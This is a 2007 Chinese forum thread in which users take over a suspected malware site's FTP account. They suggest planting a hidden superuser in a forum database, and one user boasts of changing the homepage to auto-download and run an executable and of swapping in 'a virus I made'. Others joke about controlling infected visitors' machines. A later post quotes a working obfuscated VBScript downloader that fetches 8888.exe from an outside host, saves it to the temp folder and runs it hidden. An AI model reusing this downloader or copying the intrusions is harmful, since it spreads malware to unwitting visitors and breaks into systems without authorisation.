找回密码
 注册
搜索
系统gho:最纯净好用系统下载站投放广告、加入VIP会员,请联系 微信:wuyouceo
楼主: lintel

晕。。。进了一个毒窝。123姐姐快来

[复制链接]
发表于 2007-6-5 11:35:56 | 显示全部楼层
123给的链接怎么打不开??
回复

使用道具 举报

发表于 2007-6-5 11:38:53 | 显示全部楼层
估计有人正在使用中,你的文件就上不去了,或者他的机子装有防火墙,上去就被干掉了,谁有做动网论坛的,建议往#aspdata.asp中加入adminwy超级用户,密码用动网的来生成,它的md5加密与动网一样 。原来的超级用户是admin1

[ 本帖最后由 netwinxp 于 2007-6-5 11:40 AM 编辑 ]
回复

使用道具 举报

发表于 2007-6-5 11:39:00 | 显示全部楼层
原帖由 弄潮儿-NET 于 2007-6-5 11:35 AM 发表


哈哈,你个马屁精,挺会泡妞的……要向你学习了



:lol :lol 谢谢 谢谢  得到您的的夸奖心里非常高兴

貌似我这里现在卡的要死  为什么那??2M宽带啊!!
回复

使用道具 举报

发表于 2007-6-5 11:42:22 | 显示全部楼层
原帖由 netwinxp 于 2007-6-5 11:38 发表
估计有人正在使用中,你的文件就上不去了,或者他的机子装有防火墙,上去就被干掉了,谁有做动网论坛的,建议往#aspdata.asp中加入adminwy超级用户,密码用动网的来生成,它的md5加密与动网一样 。原来的超级用 ...

这个任务就交给你了
回复

使用道具 举报

发表于 2007-6-5 11:42:35 | 显示全部楼层
原帖由 123 于 2007-6-5 11:32 发表
http://sp.adsl88.cn
打不开,楼上把这个传上去
好像传上后会自动删除

http是h_ttp://cp.182111.com或h_htp://219.133.204.245/wwwroot/
WWW不一定会和ftp一样

[ 本帖最后由 netwinxp 于 2007-6-5 11:43 AM 编辑 ]
回复

使用道具 举报

发表于 2007-6-5 11:46:45 | 显示全部楼层
原帖由 netwinxp 于 2007-6-5 11:42 发表

http是h_ttp://cp.182111.com或h_htp://219.133.204.245/wwwroot/
WWW不一定会和ftp一样

昨天明明可以打开啊。而且http://sp.adsl88.cn/login.asp也可以用
回复

使用道具 举报

发表于 2007-6-5 11:49:04 | 显示全部楼层
我先吃饭去,饿死了:P
回复

使用道具 举报

发表于 2007-6-5 11:51:49 | 显示全部楼层
原帖由 <i>xywlty</i> 于 2007-6-5 11:39 AM 发表 <a href="http://bbs.wuyou.net/redirect.php?goto=findpost&pid=1089348&ptid=107043" target="_blank"><img src="http://bbs.wuyou.net/images/common/back.gif" border="0" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onmouseover="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.wuyou.net/images/common/back.gif');}" onmousewheel="return imgzoom(this);" alt="" /></a><br />

<br />

<br />

<br />
<img src="images/smilies/lol.gif" smilieid="12" border="0" alt="" /> <img src="images/smilies/lol.gif" smilieid="12" border="0" alt="" /> 谢谢 谢谢&nbsp;&nbsp;得到您的的夸奖心里非常高兴<br />
<br />
貌似我这里现在卡的要死&nbsp;&nbsp;为什么那??2M宽带啊!!
<br />

中招了吧你
回复

使用道具 举报

发表于 2007-6-5 12:13:43 | 显示全部楼层
所有的asp,htm,html文件都传不上去,准备删除所有文件
回复

使用道具 举报

发表于 2007-6-5 12:17:23 | 显示全部楼层
原帖由 弄潮儿-NET 于 2007-6-5 11:51 AM 发表


中招了吧你


不会的  目前还没有中招的表现,另外安全防护作的还是比较好的!!!!

嘿嘿!!!大家中午快乐  俺刚吃了饭回来!!!!    ;P
回复

使用道具 举报

发表于 2007-6-5 12:43:24 | 显示全部楼层
把里面一些文件夹换成了文件夹图标的病毒
回复

使用道具 举报

发表于 2007-6-5 12:44:59 | 显示全部楼层
原帖由 <i>xywlty</i> 于 2007-6-5 12:17 PM 发表 <a href="http://bbs.wuyou.net/redirect.php?goto=findpost&pid=1089380&ptid=107043" target="_blank"><img src="http://bbs.wuyou.net/images/common/back.gif" border="0" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onmouseover="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.wuyou.net/images/common/back.gif');}" onmousewheel="return imgzoom(this);" alt="" /></a><br />

<br />

<br />
不会的&nbsp;&nbsp;目前还没有中招的表现,另外安全防护作的还是比较好的!!!!<br />
<br />
嘿嘿!!!大家中午快乐&nbsp;&nbsp;俺刚吃了饭回来!!!!&nbsp; &nbsp; <img src="images/smilies/titter.gif" smilieid="9" border="0" alt="" />
<br />

那就是你穿的防弹衣太重了,纯金的吧……
回复

使用道具 举报

 楼主| 发表于 2007-6-5 13:09:48 | 显示全部楼层
开机就出现IEXPLORER.exe  结束进程的时候居然出现了类似atuoit程序那样的自动控制!在确定是否结束的时候就自动选择了否!可怕而又BT的病毒!:@
回复

使用道具 举报

 楼主| 发表于 2007-6-5 13:12:55 | 显示全部楼层
下载了一个IceSword.zip,用RAR可以直接打开,而用RAR解压文件后居然看不见文件!一打开IceSword目录就被关闭!用RAR直接打开IceSword.exe,出现了什么?居然提示是否退出!但是并没有完全退出!

[ 本帖最后由 lintel 于 2007-6-5 01:20 PM 编辑 ]
screenshot1.jpg
screenshot4.jpg
回复

使用道具 举报

发表于 2007-6-5 13:36:35 | 显示全部楼层
将IceSword改名,用reshacker把IceSword.exe的标题改了
发现要上传asp,htm,html文件必须先改扩展名,上传后再改回来
回复

使用道具 举报

 楼主| 发表于 2007-6-5 13:44:27 | 显示全部楼层
原帖由 123 于 2007-6-5 01:36 PM 发表
将IceSword改名,用reshacker把IceSword.exe的标题改了
发现要上传asp,htm,html文件必须先改扩展名,上传后再改回来

改了名字和标题,现在正常使用了。:$


IEXPLORER.EXE 是正常进程,没有发现可疑的DLL。也就是所没有线程插入,可是这个又是为什么呢?
回复

使用道具 举报

 楼主| 发表于 2007-6-5 13:45:49 | 显示全部楼层
FTP已经被改,可能已经发现了。
回复

使用道具 举报

发表于 2007-6-5 13:46:00 | 显示全部楼层
IEXPLORER.EXE是病毒,IEXPLORE.EXE 才是正常进程
回复

使用道具 举报

发表于 2007-6-5 13:46:49 | 显示全部楼层
原帖由 lintel 于 2007-6-5 13:45 发表
FTP已经被改,可能已经发现了。

是我改的,打开主页自动下载运行8888.exe
回复

使用道具 举报

发表于 2007-6-5 13:48:49 | 显示全部楼层
上帝啊!才几分钟就有那么多人中招了!赶快删了!
1.JPG
回复

使用道具 举报

 楼主| 发表于 2007-6-5 13:50:16 | 显示全部楼层
原帖由 123 于 2007-6-5 01:46 PM 发表
IEXPLORER.EXE是病毒,IEXPLORE.EXE 才是正常进程

SORRY,是我打错了IEXPLORE.EXE。
该文件来自D:\Program Files\Internet Explorer
我的系统装在了D:
回复

使用道具 举报

 楼主| 发表于 2007-6-5 13:51:03 | 显示全部楼层
原帖由 123 于 2007-6-5 01:48 PM 发表
上帝啊!才几分钟就有那么多人中招了!赶快删了!

狂汗!
回复

使用道具 举报

 楼主| 发表于 2007-6-5 13:56:18 | 显示全部楼层
建议抓出幕后黑手!我现在在SCANING。。。看看有什么漏洞没。。。
回复

使用道具 举报

发表于 2007-6-5 13:58:12 | 显示全部楼层
原帖由 lintel 于 2007-6-5 13:51 发表

狂汗!

好像不是我改主页的原因,那个文件名变成了gg.exe,应该是有人中了跟你一样的病毒然后自动下载的,昨天我替换掉了里面好几个EXE文件。
不过中我做的病毒总比中他们的盗号病毒好吧:lol

[ 本帖最后由 123 于 2007-6-5 01:59 PM 编辑 ]
回复

使用道具 举报

 楼主| 发表于 2007-6-5 14:03:07 | 显示全部楼层
原帖由 123 于 2007-6-5 01:58 PM 发表

好像不是我改主页的原因,那个文件名变成了gg.exe,应该是有人中了跟你一样的病毒然后自动下载的,昨天我替换掉了里面好几个EXE文件。
不过中我做的病毒总比中他们的盗号病毒好吧:lol

你的当然可以放心:P
回复

使用道具 举报

发表于 2007-6-5 14:05:09 | 显示全部楼层
回复

使用道具 举报

发表于 2007-6-5 14:05:29 | 显示全部楼层
呵呵,楼上的各位玩得开心不?

小心这几天有网警上门调查哦,

下面这代码也太老太直白了吧,

  1. on error resume next
  2. xx="object"
  3. xxx="classid"


  4. ddddddddddddddd

  5. xxxx="CLSID:bd96C556-65A3-11d0-983a-00c04fc29e36"
  6. xxxxx="Microsoft.XMLHTTP"
  7. xxxxxx="GET"
  8. xxxxxxx="Scripting.FileSystemObject"
  9. xxxxxxxx="Shell.Application"
  10. dl = "        http://sp.adsl88.cn/8888.exe"
  11. Set df = document.createElement(xx)
  12. df.setAttribute xxx, xxxx
  13. str=xxxxx
  14. Set x = df.CreateObject(str,"")
  15. a1="Ado"
  16. a2="db."
  17. a3="Str"
  18. a4="eam"
  19. str1=a1&a2&a3&a4
  20. str5=str1
  21. set S = df.createobject(str5,"")
  22. S.type = 1
  23. str6=xxxxxx
  24. x.Open str6, dl, False
  25. x.Send
  26. fname1="8888.exe"
  27. set F = df.createobject(xxxxxxx,"")
  28. set tmp = F.GetSpecialFolder(2)
  29. fname1= F.BuildPath(tmp,fname1)
  30. S.open
  31. S.write x.responseBody
  32. S.savetofile fname1,2
  33. S.close
  34. set Q = df.createobject(xxxxxxxx,"")
  35. Q.ShellExecute fname1,"","","open",0
复制代码
回复

使用道具 举报

发表于 2007-6-5 14:08:58 | 显示全部楼层
这家伙真倒霉,开着瑞星还是中了灰鸽子,帮他杀一下
1.JPG
回复

使用道具 举报

 楼主| 发表于 2007-6-5 14:11:08 | 显示全部楼层
原帖由 123 于 2007-6-5 02:05 PM 发表
我觉得你可能中了这个病毒http://bbs.cfanhome.com/read.php?tid-38000.html

并非这个病毒!仅仅只是一个内核驱动文件(已经被我删除)和一个EXE文件(已经被我删除),一个DLL文件(还删不了)
回复

使用道具 举报

发表于 2007-6-5 14:12:25 | 显示全部楼层
楼上的跑到我电脑来了,看来瑞星不行啊,赶紧换先……
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1|闽公网安备35020302032614号 )

GMT+8, 2026-9-18 04:06

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表